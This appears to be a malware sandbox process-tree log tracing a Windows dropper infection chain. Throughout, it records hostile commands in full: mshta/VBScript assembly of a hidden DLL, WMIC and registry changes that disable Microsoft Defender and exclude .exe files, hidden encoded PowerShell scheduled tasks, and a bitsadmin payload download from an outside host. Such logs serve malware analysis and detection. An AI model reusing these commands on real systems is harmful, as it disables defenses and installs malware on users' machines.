C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "=="" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipT:cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ).RuN("Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I& StArT control.exe ..\QVNGP.I & del /Q * " , 0, true ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX+ KPeo.Pvp + _OTV19C.~ +EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I&StArT control.exe ..\QVNGP.I &del /Q *13⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "14⤵
-
C:\Windows\SysWOW64\control.execontrol.exe ..\QVNGP.I14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I15⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I17⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -Im "3wXJ4lAIKgiKLgvmdG797CDc.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\_qv5j3tyMd2tOxtT6_2zON_w.exe"C:\Users\Admin\Documents\_qv5j3tyMd2tOxtT6_2zON_w.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\OQ9NtuO6JHQnY9SFDYgUVVIz.exe"C:\Users\Admin\Documents\OQ9NtuO6JHQnY9SFDYgUVVIz.exe" silent8⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\Documents\dsQPkh9tG0K0PzlTW1QKUBWp.exe"C:\Users\Admin\Documents\dsQPkh9tG0K0PzlTW1QKUBWp.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS3186.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8831.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
- Enumerates system info in registry
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsxtxXcSD" /SC once /ST 07:45:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 09:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\GfqpmkO.exe\" uG /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
C:\Users\Admin\Documents\viS4LjrQND00jXigLAPpAiaB.exe"C:\Users\Admin\Documents\viS4LjrQND00jXigLAPpAiaB.exe"8⤵
C:\Users\Admin\AppData\Roaming\6523419.scr"C:\Users\Admin\AppData\Roaming\6523419.scr" /S9⤵
C:\Users\Admin\AppData\Roaming\5450761.scr"C:\Users\Admin\AppData\Roaming\5450761.scr" /S9⤵
- Suspicious behavior: SetClipboardViewer
C:\Users\Admin\AppData\Roaming\3768036.scr"C:\Users\Admin\AppData\Roaming\3768036.scr" /S9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Users\Admin\AppData\Roaming\5443503.scr"C:\Users\Admin\AppData\Roaming\5443503.scr" /S9⤵
C:\Users\Admin\Documents\Qb2MIi9oegNnBVbG5gd1YnhC.exe"C:\Users\Admin\Documents\Qb2MIi9oegNnBVbG5gd1YnhC.exe"8⤵
C:\Users\Admin\Documents\Qb2MIi9oegNnBVbG5gd1YnhC.exe"C:\Users\Admin\Documents\Qb2MIi9oegNnBVbG5gd1YnhC.exe"9⤵
C:\Users\Admin\Documents\E7_q5xma2JVRvdCbEcfyiaua.exe"C:\Users\Admin\Documents\E7_q5xma2JVRvdCbEcfyiaua.exe"8⤵
C:\Users\Admin\AppData\Local\Temp\is-OUBP7.tmp\E7_q5xma2JVRvdCbEcfyiaua.tmp"C:\Users\Admin\AppData\Local\Temp\is-OUBP7.tmp\E7_q5xma2JVRvdCbEcfyiaua.tmp" /SL5="$30288,506127,422400,C:\Users\Admin\Documents\E7_q5xma2JVRvdCbEcfyiaua.exe"9⤵
- Loads dropped DLL
C:\Users\Admin\AppData\Local\Temp\is-0P5RJ.tmp\Adam.exe"C:\Users\Admin\AppData\Local\Temp\is-0P5RJ.tmp\Adam.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
C:\Users\Admin\AppData\Local\Temp\GXOTHDAITP\foldershare.exe"C:\Users\Admin\AppData\Local\Temp\GXOTHDAITP\foldershare.exe" /VERYSILENT11⤵
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 98012⤵
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6060 -s 100812⤵
- Program crash
C:\Users\Admin\AppData\Local\Temp\29-60ea1-392-67bba-2ec8794e5ff0c\Jykelaemyge.exe"C:\Users\Admin\AppData\Local\Temp\29-60ea1-392-67bba-2ec8794e5ff0c\Jykelaemyge.exe"11⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae88471813⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae88471813⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae88471813⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae88471813⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae88471813⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae88471813⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae88471813⤵
C:\Users\Admin\AppData\Local\Temp\60-46ecc-446-50b95-6af7986d1fbd0\Cuqubileny.exe"C:\Users\Admin\AppData\Local\Temp\60-46ecc-446-50b95-6af7986d1fbd0\Cuqubileny.exe"11⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rjinq32p.uu4\GcleanerEU.exe /eufive & exit12⤵
C:\Users\Admin\AppData\Local\Temp\rjinq32p.uu4\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\rjinq32p.uu4\GcleanerEU.exe /eufive13⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 25214⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\24hydtq5.1zb\installer.exe /qn CAMPAIGN="654" & exit12⤵
C:\Users\Admin\AppData\Local\Temp\24hydtq5.1zb\installer.exeC:\Users\Admin\AppData\Local\Temp\24hydtq5.1zb\installer.exe /qn CAMPAIGN="654"13⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\41dlso1t.r15\any.exe & exit12⤵
C:\Users\Admin\AppData\Local\Temp\41dlso1t.r15\any.exeC:\Users\Admin\AppData\Local\Temp\41dlso1t.r15\any.exe13⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4drdo1w0.5e5\DownFlSetup122.exe & exit12⤵
C:\Users\Admin\AppData\Local\Temp\4drdo1w0.5e5\DownFlSetup122.exeC:\Users\Admin\AppData\Local\Temp\4drdo1w0.5e5\DownFlSetup122.exe13⤵
C:\Users\Admin\AppData\Roaming\5145703.scr"C:\Users\Admin\AppData\Roaming\5145703.scr" /S14⤵
C:\Users\Admin\AppData\Roaming\8242869.scr"C:\Users\Admin\AppData\Roaming\8242869.scr" /S14⤵
- Suspicious behavior: SetClipboardViewer
C:\Users\Admin\AppData\Roaming\4788150.scr"C:\Users\Admin\AppData\Roaming\4788150.scr" /S14⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x0ltwglz.g2v\cust2.exe & exit12⤵
C:\Users\Admin\AppData\Local\Temp\x0ltwglz.g2v\cust2.exeC:\Users\Admin\AppData\Local\Temp\x0ltwglz.g2v\cust2.exe13⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tcxegant.nxf\gcleaner.exe /mixfive & exit12⤵
C:\Users\Admin\AppData\Local\Temp\tcxegant.nxf\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\tcxegant.nxf\gcleaner.exe /mixfive13⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 26414⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\grbttkdw.w1x\autosubplayer.exe /S & exit12⤵
C:\Users\Admin\AppData\Local\Temp\grbttkdw.w1x\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\grbttkdw.w1x\autosubplayer.exe /S13⤵
- Drops file in Program Files directory
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pehbuAUvOgr0pPji -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p7MGCcRF8TyEcJi9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\cjArzio\cjArzio.dll" cjArzio14⤵
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\cjArzio\cjArzio.dll" cjArzio15⤵
- Drops file in System32 directory
- Drops file in Windows directory
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
